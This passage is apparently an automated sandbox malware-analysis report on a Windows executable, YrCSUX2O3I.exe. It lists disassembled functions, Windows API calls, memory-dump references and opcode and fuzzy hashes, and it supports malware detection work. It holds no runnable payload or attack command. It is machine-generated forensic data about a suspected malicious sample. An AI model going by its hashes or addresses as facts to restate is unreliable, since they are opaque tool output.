                                                            • DeleteObject.GDI32(00000000), ref: 00401D36
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                            • String ID:
                                                            • API String ID: 1849352358-0
                                                            • Opcode ID: 9df21d8324280b954a21fe08bb3736f9504f12d3c69ac91fc64e9be1e30a0862
                                                            • Instruction ID: 44b403d8ea142f61c46f59bdf5c6715f811f2d25bbd76591197da0c88fd97a40
                                                            • Opcode Fuzzy Hash: 9df21d8324280b954a21fe08bb3736f9504f12d3c69ac91fc64e9be1e30a0862
                                                            • Instruction Fuzzy Hash: 97F0E1B2600505BFD701DBA4EF88DDE7BBCEB08351F101465F642F1190CA749D418B38
                                                            Function 004047DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(0042D1F8,0042D1F8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 0040486F
                                                            • wsprintfW.USER32 ref: 00404878
                                                            • SetDlgItemTextW.USER32(?,0042D1F8), ref: 0040488B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: ItemTextlstrlenwsprintf
                                                            • String ID: %u.%u%s%s
                                                            • API String ID: 3540041739-3551169577
                                                            • Opcode ID: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
                                                            • Instruction ID: 9325b392590c5ef976e2008094ad60f82e4542d9ead9839402a3ec0ae1c12cd4
                                                            • Opcode Fuzzy Hash: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
                                                            • Instruction Fuzzy Hash: F01126336002243BDB10666D9C4AEEF3699DFC2335F144637FA25F60D0D979881186E8
                                                            Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Timeout
                                                            • String ID: !
                                                            • API String ID: 1777923405-2657877971
                                                            • Opcode ID: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
                                                            • Instruction ID: cdd208a87cf377e151b028b5bc2daf4d5ae5f0581749dcda0b9a9113f5b0b00f
                                                            • Opcode Fuzzy Hash: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
                                                            • Instruction Fuzzy Hash: 35216271A44109AFDF01AFB0DA4AAAE7A75EF44744F14403EF502B61D1DAB88590DB58
                                                            Function 00401F98 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FC3
                                                              • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                              • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                              • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,76F923A0), ref: 00405055
                                                              • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                              • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                              • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                              • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                            • String ID: OC
                                                            • API String ID: 334405425-1597561874
                                                            • Opcode ID: 1a63145c29d69d2f68bd0ff66438051318ef2c032ef63ab5126504a865d37410
                                                            • Instruction ID: a758f152f971d74a5f32e3130d7e663150c352659b46f9ca4e023949e3a286cd
                                                            • Opcode Fuzzy Hash: 1a63145c29d69d2f68bd0ff66438051318ef2c032ef63ab5126504a865d37410
                                                            • Instruction Fuzzy Hash: 0A21A771900216EBCF20AFA5CE49A9E7EB0AF09354F20413BF615B51E0D7BD8982DB5D
                                                            Function 004057AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 004057B4
                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 004057BE
                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 004057D0
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004057AE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrcatlstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 2659869361-297319885
                                                            • Opcode ID: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
                                                            • Instruction ID: d5080c12e7ff52c275ddc2bb7fa08cb5908483c46ce1eaa0ff7902437740b8fb
                                                            • Opcode Fuzzy Hash: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
                                                            • Instruction Fuzzy Hash: 6ED05E31101E20AAC1116B549C08EDF66ACEE45300740802BF141B30A1D7781D418AFD
                                                            Function 00402C9B Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(00000000,00000000,00402E7B,00000001,?,?,?,00000000,004033FE,?), ref: 00402CAE
                                                            • GetTickCount.KERNEL32 ref: 00402CCC
                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402C15,00000000), ref: 00402CE9
                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,004033FE,?), ref: 00402CF7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                            • String ID:
                                                            • API String ID: 2102729457-0
                                                            • Opcode ID: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
                                                            • Instruction ID: 286efe5820fb8a572a90530028cebd71549732c65272ed0b190b82beaa7bbda7
                                                            • Opcode Fuzzy Hash: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
                                                            • Instruction Fuzzy Hash: 6CF05E70606620BFD7216B24FF4D98F7A64F744B11B91043AF141B11E4C7B448C18BDC
                                                            Function 00404F6E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 00404F9D
                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00404FEE
                                                              • Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Window$CallMessageProcSendVisible
                                                            • String ID:
                                                            • API String ID: 3748168415-3916222277
                                                            • Opcode ID: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                            • Instruction ID: 5368250be3cb6e4106e80ca770201d47c576881e659a98db37bb9bc21f5752cc
                                                            • Opcode Fuzzy Hash: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                            • Instruction Fuzzy Hash: 1A0184B150020AAFDF219F11DD81EAB3766EBC5755F104037FB00761D1CB7A8D62D669
                                                            Function 00403685 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76F93420,0040365D,0040349F,?), ref: 0040369F
                                                            • GlobalFree.KERNEL32(?), ref: 004036A6
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403697
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Free$GlobalLibrary
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 1100898210-297319885
                                                            • Opcode ID: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                            • Instruction ID: 198638f61427fefc2148c68e53f1161767bd25bd987848fccacf8e5b1a1d3e49
                                                            • Opcode Fuzzy Hash: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                            • Instruction Fuzzy Hash: C1E08C3250112067CA315F65E90472AB76CAF4AB22F05442AE8807B36087745C534BC8
                                                            Function 004057FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\YrCSUX2O3I.exe,C:\Users\user\Desktop\YrCSUX2O3I.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00405800
                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\YrCSUX2O3I.exe,C:\Users\user\Desktop\YrCSUX2O3I.exe,80000000,00000003,?,?,?,00000000,004033FE), ref: 00405810
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrlen
                                                            • String ID: C:\Users\user\Desktop
                                                            • API String ID: 2709904686-2743851969
                                                            • Opcode ID: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
                                                            • Instruction ID: 957e04025a41c1941cffb014cac20df3e0ff5def3477a48c76d927f6f21090a4
                                                            • Opcode Fuzzy Hash: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
                                                            • Instruction Fuzzy Hash: EED05EB3411D209AD3127B04DC04A9F67ACFF51300746846AE841A61A1D7B85C908AEC
                                                            Function 00405934 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                            • lstrcmpiA.KERNEL32(?,?), ref: 0040595C
                                                            • CharNextA.USER32(?,?,00000000,00405B51,00000000,[Rename]), ref: 0040596D
                                                            • lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                            • Instruction ID: d765cdcf26b5ece385e96dcd0ac43345a120d35f2bfa0d6b32256e58560247d7
